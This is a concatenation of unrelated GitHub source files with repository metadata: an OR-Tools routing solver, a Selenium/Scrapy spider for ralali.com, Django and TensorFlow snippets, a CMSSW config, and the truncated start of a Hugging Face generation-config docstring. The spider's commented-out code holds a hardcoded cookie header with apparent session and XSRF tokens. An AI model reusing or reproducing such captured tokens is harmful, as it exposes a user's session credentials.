timelimit = int(inputs[2]) + 1
switch_timeLimit = True
else:
timelimit = 60
switch_timeLimit = False
start_time = time.time()
data = create_data_model(coords, anum)
# Create the routing index manager.
manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']),
data['num_vehicles'], data['depot'])
# Create Routing Model.
routing = pywrapcp.RoutingModel(manager)
# Create and register a transit callback.
def distance_callback(from_index, to_index):
"""Returns the distance between the two nodes."""
# Convert from routing variable Index to distance matrix NodeIndex.
from_node = manager.IndexToNode(from_index)
to_node = manager.IndexToNode(to_index)
return data['distance_matrix'][from_node][to_node]
transit_callback_index = routing.RegisterTransitCallback(distance_callback)
# Define cost of each arc.
routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
# Add Distance constraint.
dimension_name = 'Distance'
routing.AddDimension(
transit_callback_index,
0, # no slack
10000000, # vehicle maximum travel distance
True, # start cumul to zero
dimension_name)
distance_dimension = routing.GetDimensionOrDie(dimension_name)
distance_dimension.SetGlobalSpanCostCoefficient(100)
# Setting first solution heuristic.
search_parameters = pywrapcp.DefaultRoutingSearchParameters()
# Setting time limitation
search_parameters.time_limit.seconds = timelimit
search_parameters.first_solution_strategy = (
routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
# Solve the problem.
solution = routing.SolveWithParameters(search_parameters)
# Print solution on console.
tourlen, tours = print_solution(data, manager, routing, solution)
return [tourlen, tours]
def ortool_baseline_singleTrack(coords, anum):
# print(coords.size())
device = coords.device
coords = coords.cpu()
batch_size = coords.size(0)
tourlen = []
replan_tours = []
for b in range(batch_size):
result = solve_instance_vrp([coords[b], anum])
tourlen.append(result[0])
replan_tours.append(result[1])
tourlen = torch.stack(tourlen, dim=0)
return tourlen.to(device), replan_tours
def orplanning_under_timeLimitation_singTrack(coords, anum, tusage):
device = coords.device
coords = coords.cpu()
batch_size = coords.size(0)
tourlen = []
replan_tours = []
for b in range(batch_size):
result = solve_instance_vrp([coords[b], anum, tusage])
tourlen.append(result[0])
replan_tours.append(result[1])
tourlen = torch.stack(tourlen, dim=0)
return tourlen.to(device), replan_tours
# def orplanning_under_inital_solution(coords, anum, tusage, initial_solution):
# device = coords.device
# coords = coords.cpu()
# batch_size = coords.size(0)
# pool = multiprocessing.Pool(processes=26)
# multi_inputs = []
# for b in range(batch_size):
# mptour = []
# for a in range(anum):
# # print(initial_solution[b][0][a][1:-1])
# atour = torch.tensor(initial_solution[b][0][a][1:-1]).long().cpu()
# atour = list(np.array(atour))
# mptour.append(atour)
# multi_inputs.append([coords[b], anum, tusage, mptour])
# result = pool.map(solve_vrp_with_inital_solution, multi_inputs)
# pool.close()
# tourlen = []
# duration = []
# for b in range(batch_size):
# tourlen.append(result[b][0])
# duration.append(result[b][1])
# tourlen = torch.stack(tourlen, dim=0)
# duration = torch.tensor(duration)
# return tourlen.to(device), duration.to(device)
def orplanning_under_inital_solution_singleTrack(coords, anum, tusage, initial_solution):
device = coords.device
coords = coords.cpu()
batch_size = coords.size(0)
tourlen = []
replan_tours = []
for b in range(batch_size):
mptour = []
for a in range(anum):
# print(initial_solution[b][0][a][1:-1])
atour = torch.tensor(initial_solution[b][0][a][1:-1]).long().cpu()
atour = list(np.array(atour))
mptour.append(atour)
result = solve_vrp_with_inital_solution([coords[b], anum, tusage, mptour])
tourlen.append(result[0])
replan_tours.append(result[1])
tourlen = torch.stack(tourlen, dim=0)
return tourlen.to(device), replan_tours
def solve_vrp_with_inital_solution(inputs):
"""Solve the CVRP problem."""
# Instantiate the data problem.
coords = inputs[0]
anum = inputs[1]
timelimit = int(inputs[2])
init_solution = inputs[3]
# print(init_solution)
start_time = time.time()
data = create_data_model(coords, anum)
# Create the routing index manager.
manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']),
data['num_vehicles'], data['depot'])
# Create Routing Model.
routing = pywrapcp.RoutingModel(manager)
# Create and register a transit callback.
def distance_callback(from_index, to_index):
"""Returns the distance between the two nodes."""
# Convert from routing variable Index to distance matrix NodeIndex.
from_node = manager.IndexToNode(from_index)
to_node = manager.IndexToNode(to_index)
return data['distance_matrix'][from_node][to_node]
transit_callback_index = routing.RegisterTransitCallback(distance_callback)
# Define cost of each arc.
routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
# Add Distance constraint.
dimension_name = 'Distance'
routing.AddDimension(
transit_callback_index,
0, # no slack
10000000, # vehicle maximum travel distance
True, # start cumul to zero
dimension_name)
distance_dimension = routing.GetDimensionOrDie(dimension_name)
distance_dimension.SetGlobalSpanCostCoefficient(100)
# Setting initial solutions
initial_solution = routing.ReadAssignmentFromRoutes(init_solution, True)
# Setting first solution heuristic.
search_parameters = pywrapcp.DefaultRoutingSearchParameters()
# Setting time limitation
search_parameters.time_limit.seconds = timelimit
# Solve the problem.
solution = routing.SolveFromAssignmentWithParameters(initial_solution, search_parameters)
# Print solution on console.
if solution:
tourlen, tours = print_solution(data, manager, routing, solution)
tusage = time.time() - start_time
# print(tourlen)
# print("--------------------")
return [tourlen, tours]
| [
"noreply@github.com"
] | xiaogaogaoxiao.noreply@github.com |
01f60295b0772615b4e1dca648ecce9427677169 | 9fa1f5d9b8fd46e8383b9b7f599249831707deb1 | /DiyTrade20_2/Diy/Diy/spiders/spider_data.py | f0e23b29242da9443611a2898f51f8dfdae41179 | [] | no_license | kokohui/b2b_spider | fbf95351f6225677a33317cabca1e5d53d78a2ea | 3e4bb26075531f1e1bdd38b113561893efaaa9ed | refs/heads/master | 2020-07-21T02:50:14.514196 | 2019-09-06T08:11:26 | 2019-09-06T08:11:26 | 206,745,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,962 | py | # -*- coding: utf-8 -*-
import scrapy
import json
from scrapy import Request
from pyppeteer import launch
from selenium import webdriver
from selenium.webdriver import ChromeOptions
from time import sleep
class SpiderDataSpider(scrapy.Spider):
name = 'spider_data'
option = ChromeOptions()
option.add_experimental_option('excludeSwitches', ['enable-automation'])
# 创建一个浏览器对象
bro = webdriver.Chrome(executable_path=r'D:\chromedriver', chrome_options=option)
# start_urls = ['https://rarasearch.ralali.com/search?alias=q&brand_names=&category=&free_shipping=false&key_alias=&maxprice=9007199254740991&minprice=0&order=&page=1&payload=eyJ3aG9sZXNhbGVfcHJpY2VfZXhpc3QiOjEsImRpc2NvdW50X3BlcmNlbnRhZ2UiOjAuMDEsImlzX21hcmtldHBsYWNlIjotMTAsInZpcnR1YWxfYm9vc3QiOjEsImZyZWVfb25na2lyX251c2FudGFyYSI6MSwiaXNfbmVnb3RpYWJsZSI6LTEsInZlbmRvcl9zY29yZSI6MSwiZ29vZF9pbWFnZSI6MTAsImZyZWVfb25na2lyX2xva2FsIjowLjYsIml0ZW1fc29sZF9ub3JtIjoxLCJwYWdlX3ZpZXdfbm9ybSI6MX0%3D&q=headset&vendor_location=&wholesale=']
def start_requests(self):
url = 'https://www.ralali.com/'
bro = self.bro
bro.get(url=url)
bro.find_element_by_class_name("dropdown-toggle").click()
sleep(1)
bro.find_element_by_link_text("Bahasa Indonesia").click()
sleep(1)
bro.find_element_by_xpath("/html/body/header/section/div[2]/div/div[4]/div/form/div/input").send_keys('headset')
sleep(1)
bro.find_element_by_class_name("btn btnSearchHome").click()
# def parse(self, response):
# res_text_json = response.text
# res_text_data = json.loads(res_text_json)
# # print(res_text_data, type(res_text_data))
# hits_list = res_text_data.get("hits").get("hits")[0]
# print(hits_list)
# # for hits in hits_list:
# res_url = hits_list.get("_source").get("alias")
# res_url = "https://www.ralali.com/v/rantchromegarage/product/" + res_url
# headers = {
# 'cookie': 'rll_grnt=7b82376c43f74900d225fdab213ab177115e78e5-10433ecc8ed7b42bef9da37454fc81ed_fcc763d11eec41950913c6e7c28eec59; _ga=GA1.2.848148245.1567129123; _gid=GA1.2.1836881632.1567129123; cto_lwid=e661febf-cb6a-41ab-beab-c551b854542e; dayOfYear=242; show_top_banner=1; _hjid=a0226024-f4ac-4f90-a629-7aef4f7b056d; _gat_UA-42713825-6=1; previous_url=eyJpdiI6Imx3c0lrWHV1UUlwOStZaGNGbUN1bmc9PSIsInZhbHVlIjoiWXRVY1JZVkZ0Ynl1ZU5wWXRWYWZjS2hOSFZ5Q1FHaWNMMUpNQXo2aEkzXC9JMStMWk5OOGY2cEwrM29aVkNodDB0YWNZSlU5cmMzRGpyV3Y1UUZxYXRWRGR2QVc5bDN3VHVcL3hFWWlpV2tzT2J1dFNhaXVkQ1dDb3hnMWpJQW8yZyIsIm1hYyI6ImRkZTIzODY1MmNmYmE5OWEwZTdjYmNhNjFkNDI4OTM2MDk5YjEzZmIwMWJmZjgzMDRjZDNiMDhhN2M1NzU0NjAifQ%3D%3D; XSRF-TOKEN=eyJpdiI6IjJQVHZKUWx1bFFpZnd5K3JTQXFSMkE9PSIsInZhbHVlIjoiUTRZR2M3XC9jOUFNV0swaGFWNkx0eUFRM2lHRzI0OHZMQWJFVG5LTWdJVHhQNmNVdlNNNHlKVkFQWHROM0R1UnBXblwva1FWVkhMRkZKVU9jWUZDa1NnUT09IiwibWFjIjoiZWYzZTBmMDQzMGJmOGQzNTg0YjBkMDE0M2U4NjcyNTc5ZDM4N2VlZjdjMThhNWQwNDFmYjk5OTkyOGEyODY1OSJ9; ralali=eyJpdiI6Imx2REhQYmlyaUFrTHppbGM0RVBuNEE9PSIsInZhbHVlIjoibFRITTk4eTlBSlwveEx1Y01zalFZaVV5UFdUenhKd2RBNW1JK3doWUkrUkNNRHl2TWpjRkNKbkw1VDU5bUhlU3I3aDNJNlwvQ0ZpMHcwV1NIZEZkTVZVZz09IiwibWFjIjoiNWU2ZDIxYTA3MGRmNWJkYWMyZjIxMWQxYTNkNmNhZjE5ZGY0NDk0MGVkMjI3YThjMWRjMmY3NDBkNGU4YTkxOCJ9; amplitude_id_2c1a3f70ab02cb610ab2905c0c4c63c6ralali.com=eyJkZXZpY2VJZCI6IjJkNDhlYTE5LWQ1MTctNDkxOC1hNTg4LTI1NDRhZTA5ZDlkNVIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2NzEyOTEyMzgzNCwibGFzdEV2ZW50VGltZSI6MTU2NzEzNTE5NTUxNSwiZXZlbnRJZCI6MzMsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjozM30='
# }
# yield Request(url=res_url, headers=headers, callback=self.parse_detail)
# def parse_detail(self, response):
# # print(response.text)
# with open('jj.html', 'w', encoding='utf-8') as f:
# f.write(response.text)
# https://www.ralali.com/v/rantchromegarage/product/ach1001-belink-wireless-bluetooth-headset-100000092720001
| [
"2686162923@qq.com"
] | 2686162923@qq.com |
463b6bb70cca8e70a802d8985558490eaa73d7b1 | e845f7f61ff76b3c0b8f4d8fd98f6192e48d542a | /djangocg/contrib/gis/sitemaps/__init__.py | 6765153ec0be6d9dcc32bad86c6a4420403d07bf | [
"BSD-3-Clause"
] | permissive | timothyclemans/djangocg | fd150c028013cb5f53f5a3b4fdc960a07fdaaa78 | 52cf28e046523bceb5d436f8e6bf61e7d4ba6312 | refs/heads/master | 2021-01-18T13:20:13.636812 | 2012-08-31T23:38:14 | 2012-08-31T23:38:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | # Geo-enabled Sitemap classes.
from djangocg.contrib.gis.sitemaps.georss import GeoRSSSitemap
from djangocg.contrib.gis.sitemaps.kml import KMLSitemap, KMZSitemap
| [
"timothy.clemans@gmail.com"
] | timothy.clemans@gmail.com |
23f542b49fb43c3fa7f261c20d841f00b6768b43 | dce4a52986ddccea91fbf937bd89e0ae00b9d046 | /jni-build/jni/include/tensorflow/contrib/quantization/python/dequantize_op_test.py | b1d47cc4a2edcea49cb0798241f46968a19d166a | [
"MIT"
] | permissive | Lab603/PicEncyclopedias | 54a641b106b7bb2d2f71b2dacef1e5dbeaf773a6 | 6d39eeb66c63a6f0f7895befc588c9eb1dd105f9 | refs/heads/master | 2022-11-11T13:35:32.781340 | 2018-03-15T05:53:07 | 2018-03-15T05:53:07 | 103,941,664 | 6 | 3 | MIT | 2022-10-28T05:31:37 | 2017-09-18T13:20:47 | C++ | UTF-8 | Python | false | false | 3,108 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Dequantize Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
# TODO(petewarden) - Remove this ugly hack to get around Python linking problems
# with Bazel.
# pylint: disable=g-bad-import-order
from tensorflow.contrib.quantization import load_quantized_ops_so
from tensorflow.contrib.quantization.kernels import load_quantized_kernels_so
class DequantizeOpTest(tf.test.TestCase):
def __init__(self, method_name="runTest"):
super(DequantizeOpTest, self).__init__(method_name)
load_quantized_ops_so.Load()
load_quantized_kernels_so.Load()
def _testDequantizeOp(self, inputs, min_range, max_range, dtype):
with self.test_session():
input_op = tf.constant(inputs, shape=[len(inputs)], dtype=dtype)
dequantized = tf.contrib.quantization.dequantize(
input_op, min_range, max_range)
tf_ans = dequantized.eval()
# TODO(vrv): Add support for DT_QINT32 quantization if needed.
type_dict = {
tf.quint8: np.uint8,
tf.qint8: np.int8,
tf.quint16: np.uint16,
tf.qint16: np.int16
}
self.assertTrue(dtype in type_dict.keys())
v_max = np.iinfo(type_dict[dtype]).max
v_min = np.iinfo(type_dict[dtype]).min
self.assertTrue(min_range >= v_min)
self.assertTrue(max_range <= v_max)
type_range = v_max - v_min
if v_min < 0:
half_range = (type_range + 1) / 2
else:
half_range = 0.0
np_ans = ((inputs.astype(np.float32) + half_range) *
(max_range - min_range) / type_range) + min_range
self.assertAllClose(tf_ans, np_ans)
def testBasicQuint8(self):
self._testDequantizeOp(np.array([0, 128, 255]),
0.0, 6.0, tf.quint8)
self._testDequantizeOp(np.array([0, 128, 255]),
0.0, 123.456, tf.quint8)
self._testDequantizeOp(np.array([0, 4, 42, 108, 243]),
5.0, 200.2, tf.quint8)
def testBasicQint8(self):
self._testDequantizeOp(np.array([-128, 0, 127]),
-1.0, 2.0, tf.qint8)
self._testDequantizeOp(np.array([-2, 4, -17]),
-5.0, -3.0, tf.qint8)
self._testDequantizeOp(np.array([0, -4, 42, -108]),
5.0, 40.0, tf.qint8)
if __name__ == "__main__":
tf.test.main()
| [
"super_mr.z@hotmail.comm"
] | super_mr.z@hotmail.comm |
a4a1b84ca118399239de8e69faf1ce3309a08cca | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/dataRunA/nano2902.py | b53a80eddc330e78e98987c0aef21725119e3d9b | [] | no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,293 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --data --eventcontent NANOAOD --datatier NANOAOD --no_exec --conditions 102X_dataRun2_Sep2018Rereco_v1 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein /users/h2/rsk146/JTTest/SL7/CMSSW_10_6_12/src/ttbarCutTest/dataReprocessing/0004A5E9-9F18-6B42-B31D-4206406CE423.root --fileout file:jetToolbox_nano_datatest.root
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:root://cms-xrd-global.cern.ch//store/data/Run2018A/EGamma/MINIAOD/17Sep2018-v2/270000/A117AAC6-171B-5D40-930E-6F3CD438F89A.root'),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.NANOAODoutput = cms.OutputModule("NanoAODOutputModule",
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('NANOAOD'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:jetToolbox_nano_datatest2902.root'),
outputCommands = process.NANOAODEventContent.outputCommands
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_dataRun2_Sep2018Rereco_v1', '')
# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequence)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.NANOAODoutput_step = cms.EndPath(process.NANOAODoutput)
# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# customisation of the process.
# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeData
#call to customisation function nanoAOD_customizeData imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeData(process)
# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)
# End of customisation functions
# Customisation from command line
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion | [
"rsk146@scarletmail.rutgers.edu"
] | rsk146@scarletmail.rutgers.edu |
e8f26b30bed768cd2432f809e12143485fcfd8da | 19a2378a7fc2aef762b0e3a70669208818feeaa9 | /src/transformers/generation/configuration_utils.py | 096424b8585b5d2dfa69598f8fe2c263216ca0e2 | [
"Apache-2.0"
] | permissive | pytorch-tpu/transformers | 494ee005c6d156161171f2a8e60f25603189408f | 6112b1c6442aaf7affd2b0676a1cd4eee30c45cf | refs/heads/master | 2023-09-03T19:34:30.326852 | 2023-07-19T20:57:40 | 2023-07-19T20:57:40 | 220,075,881 | 7 | 2 | Apache-2.0 | 2023-09-14T17:58:25 | 2019-11-06T19:40:45 | Python | UTF-8 | Python | false | false | 40,270 | py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Generation configuration class and utilities."""
import copy
import json
import os
import warnings
from typing import Any, Dict, Optional, Union
from .. import __version__
from ..configuration_utils import PretrainedConfig
from ..utils import (
GENERATION_CONFIG_NAME,
PushToHubMixin,
cached_file,
download_url,
extract_commit_hash,
is_remote_url,
logging,
)
logger = logging.get_logger(__name__)
class GenerationConfig(PushToHubMixin):
r"""
Class that holds a configuration for a generation task. A `generate` call supports the following generation methods
for text-decoder, text-to-text, speech-to-text, and vision-to-text models:
- *greedy decoding* by calling [`~generation.GenerationMixin.greedy_search`] if `num_beams=1` and
`do_sample=False`
- *contrastive search* by calling [`~generation.GenerationMixin.contrastive_search`] if `penalty_alpha>0.`
and `top_k>1`
- *multinomial sampling* by calling [`~generation.GenerationMixin.sample`] if `num_beams=1` and
`do_sample=True`
- *beam-search decoding* by calling [`~generation.GenerationMixin.beam_search`] if `num_beams>1` and
`do_sample=False`
- *beam-search multinomial sampling* by calling [`~generation.GenerationMixin.beam_sample`] if
`num_beams>1` and `do_sample=True`
- *diverse beam-search decoding* by calling [`~generation.GenerationMixin.group_beam_search`], if
`num_beams>1` and `num_beam_groups>1`
- *constrained beam-search decoding* by calling [`~generation.GenerationMixin.constrained_beam_search`], if
`constraints!=None` or `force_words_ids!=None`
- *assisted decoding* by calling [`~generation.GenerationMixin.assisted_decoding`], if
`assistant_model` is passed to `.generate()`
You do not need to call any of the above methods directly. Pass custom parameter values to '.generate()'. To learn
more about decoding strategies refer to the [text generation strategies guide](../generation_strategies).
Arg:
> Parameters that control the length of the output
max_length (`int`, *optional*, defaults to 20):
The maximum length the generated tokens can have. Corresponds to the length of the input prompt +
`max_new_tokens`. Its effect is overridden by `max_new_tokens`, if also set.
max_new_tokens (`int`, *optional*):
The maximum numbers of tokens to generate, ignoring the number of tokens in the prompt.
min_length (`int`, *optional*, defaults to 0):
The minimum length of the sequence to be generated. Corresponds to the length of the input prompt +
`min_new_tokens`. Its effect is overridden by `min_new_tokens`, if also set.
min_new_tokens (`int`, *optional*):
The minimum numbers of tokens to generate, ignoring the number of tokens in the prompt.
early_stopping (`bool` or `str`, *optional*, defaults to `False`):
Controls the stopping condition for beam-based methods, like beam-search. It accepts the following values:
`True`, where the generation stops as soon as there are `num_beams` complete candidates; `False`, where an
heuristic is applied and the generation stops when is it very unlikely to find better candidates;
`"never"`, where the beam search procedure only stops when there cannot be better candidates (canonical
beam search algorithm).
max_time(`float`, *optional*):
The maximum amount of time you allow the computation to run for in seconds. generation will still finish
the current pass after allocated time has been passed.
> Parameters that control the generation strategy used
do_sample (`bool`, *optional*, defaults to `False`):
Whether or not to use sampling ; use greedy decoding otherwise.
num_beams (`int`, *optional*, defaults to 1):
Number of beams for beam search. 1 means no beam search.
num_beam_groups (`int`, *optional*, defaults to 1):
Number of groups to divide `num_beams` into in order to ensure diversity among different groups of beams.
[this paper](https://arxiv.org/pdf/1610.02424.pdf) for more details.
penalty_alpha (`float`, *optional*):
The values balance the model confidence and the degeneration penalty in contrastive search decoding.
use_cache (`bool`, *optional*, defaults to `True`):
Whether or not the model should use the past last key/values attentions (if applicable to the model) to
speed up decoding.
> Parameters for manipulation of the model output logits
temperature (`float`, *optional*, defaults to 1.0):
The value used to modulate the next token probabilities.
top_k (`int`, *optional*, defaults to 50):
The number of highest probability vocabulary tokens to keep for top-k-filtering.
top_p (`float`, *optional*, defaults to 1.0):
If set to float < 1, only the smallest set of most probable tokens with probabilities that add up to
`top_p` or higher are kept for generation.
typical_p (`float`, *optional*, defaults to 1.0):
Local typicality measures how similar the conditional probability of predicting a target token next is to
the expected conditional probability of predicting a random token next, given the partial text already
generated. If set to float < 1, the smallest set of the most locally typical tokens with probabilities that
add up to `typical_p` or higher are kept for generation. See [this
paper](https://arxiv.org/pdf/2202.00666.pdf) for more details.
epsilon_cutoff (`float`, *optional*, defaults to 0.0):
If set to float strictly between 0 and 1, only tokens with a conditional probability greater than
`epsilon_cutoff` will be sampled. In the paper, suggested values range from 3e-4 to 9e-4, depending on the
size of the model. See [Truncation Sampling as Language Model
Desmoothing](https://arxiv.org/abs/2210.15191) for more details.
eta_cutoff (`float`, *optional*, defaults to 0.0):
Eta sampling is a hybrid of locally typical sampling and epsilon sampling. If set to float strictly between
0 and 1, a token is only considered if it is greater than either `eta_cutoff` or `sqrt(eta_cutoff) *
exp(-entropy(softmax(next_token_logits)))`. The latter term is intuitively the expected next token
probability, scaled by `sqrt(eta_cutoff)`. In the paper, suggested values range from 3e-4 to 2e-3,
depending on the size of the model. See [Truncation Sampling as Language Model
Desmoothing](https://arxiv.org/abs/2210.15191) for more details.
diversity_penalty (`float`, *optional*, defaults to 0.0):
This value is subtracted from a beam's score if it generates a token same as any beam from other group at a
particular time. Note that `diversity_penalty` is only effective if `group beam search` is enabled.
repetition_penalty (`float`, *optional*, defaults to 1.0):
The parameter for repetition penalty. 1.0 means no penalty. See [this
paper](https://arxiv.org/pdf/1909.05858.pdf) for more details.
encoder_repetition_penalty (`float`, *optional*, defaults to 1.0):
The paramater for encoder_repetition_penalty. An exponential penalty on sequences that are not in the
original input. 1.0 means no penalty.
length_penalty (`float`, *optional*, defaults to 1.0):
Exponential penalty to the length that is used with beam-based generation. It is applied as an exponent to
the sequence length, which in turn is used to divide the score of the sequence. Since the score is the log
likelihood of the sequence (i.e. negative), `length_penalty` > 0.0 promotes longer sequences, while
`length_penalty` < 0.0 encourages shorter sequences.
no_repeat_ngram_size (`int`, *optional*, defaults to 0):
If set to int > 0, all ngrams of that size can only occur once.
bad_words_ids(`List[List[int]]`, *optional*):
List of list of token ids that are not allowed to be generated. Check
[`~generation.NoBadWordsLogitsProcessor`] for further documentation and examples.
force_words_ids(`List[List[int]]` or `List[List[List[int]]]`, *optional*):
List of token ids that must be generated. If given a `List[List[int]]`, this is treated as a simple list of
words that must be included, the opposite to `bad_words_ids`. If given `List[List[List[int]]]`, this
triggers a [disjunctive constraint](https://github.com/huggingface/transformers/issues/14081), where one
can allow different forms of each word.
renormalize_logits (`bool`, *optional*, defaults to `False`):
Whether to renormalize the logits after applying all the logits processors or warpers (including the custom
ones). It's highly recommended to set this flag to `True` as the search algorithms suppose the score logits
are normalized but some logit processors or warpers break the normalization.
constraints (`List[Constraint]`, *optional*):
Custom constraints that can be added to the generation to ensure that the output will contain the use of
certain tokens as defined by `Constraint` objects, in the most sensible way possible.
forced_bos_token_id (`int`, *optional*, defaults to `model.config.forced_bos_token_id`):
The id of the token to force as the first generated token after the `decoder_start_token_id`. Useful for
multilingual models like [mBART](../model_doc/mbart) where the first generated token needs to be the target
language token.
forced_eos_token_id (`Union[int, List[int]]`, *optional*, defaults to `model.config.forced_eos_token_id`):
The id of the token to force as the last generated token when `max_length` is reached. Optionally, use a
list to set multiple *end-of-sequence* tokens.
remove_invalid_values (`bool`, *optional*, defaults to `model.config.remove_invalid_values`):
Whether to remove possible *nan* and *inf* outputs of the model to prevent the generation method to crash.
Note that using `remove_invalid_values` can slow down generation.
exponential_decay_length_penalty (`tuple(int, float)`, *optional*):
This Tuple adds an exponentially increasing length penalty, after a certain amount of tokens have been
generated. The tuple shall consist of: `(start_index, decay_factor)` where `start_index` indicates where
penalty starts and `decay_factor` represents the factor of exponential decay
suppress_tokens (`List[int]`, *optional*):
A list of tokens that will be suppressed at generation. The `SupressTokens` logit processor will set their
log probs to `-inf` so that they are not sampled.
begin_suppress_tokens (`List[int]`, *optional*):
A list of tokens that will be suppressed at the beginning of the generation. The `SupressBeginTokens` logit
processor will set their log probs to `-inf` so that they are not sampled.
forced_decoder_ids (`List[List[int]]`, *optional*):
A list of pairs of integers which indicates a mapping from generation indices to token indices that will be
forced before sampling. For example, `[[1, 123]]` means the second generated token will always be a token
of index 123.
sequence_bias (`Dict[Tuple[int], float]`, *optional*)):
Dictionary that maps a sequence of tokens to its bias term. Positive biases increase the odds of the
sequence being selected, while negative biases do the opposite. Check
[`~generation.SequenceBiasLogitsProcessor`] for further documentation and examples.
guidance_scale (`float`, *optional*):
The guidance scale for classifier free guidance (CFG). CFG is enabled by setting `guidance_scale > 1`.
Higher guidance scale encourages the model to generate samples that are more closely linked to the input
prompt, usually at the expense of poorer quality.
> Parameters that define the output variables of `generate`
num_return_sequences(`int`, *optional*, defaults to 1):
The number of independently computed returned sequences for each element in the batch.
output_attentions (`bool`, *optional*, defaults to `False`):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more details.
output_hidden_states (`bool`, *optional*, defaults to `False`):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more details.
output_scores (`bool`, *optional*, defaults to `False`):
Whether or not to return the prediction scores. See `scores` under returned tensors for more details.
return_dict_in_generate (`bool`, *optional*, defaults to `False`):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
> Special tokens that can be used at generation time
pad_token_id (`int`, *optional*):
The id of the *padding* token.
bos_token_id (`int`, *optional*):
The id of the *beginning-of-sequence* token.
eos_token_id (`Union[int, List[int]]`, *optional*):
The id of the *end-of-sequence* token. Optionally, use a list to set multiple *end-of-sequence* tokens.
> Generation parameters exclusive to encoder-decoder models
encoder_no_repeat_ngram_size (`int`, *optional*, defaults to 0):
If set to int > 0, all ngrams of that size that occur in the `encoder_input_ids` cannot occur in the
`decoder_input_ids`.
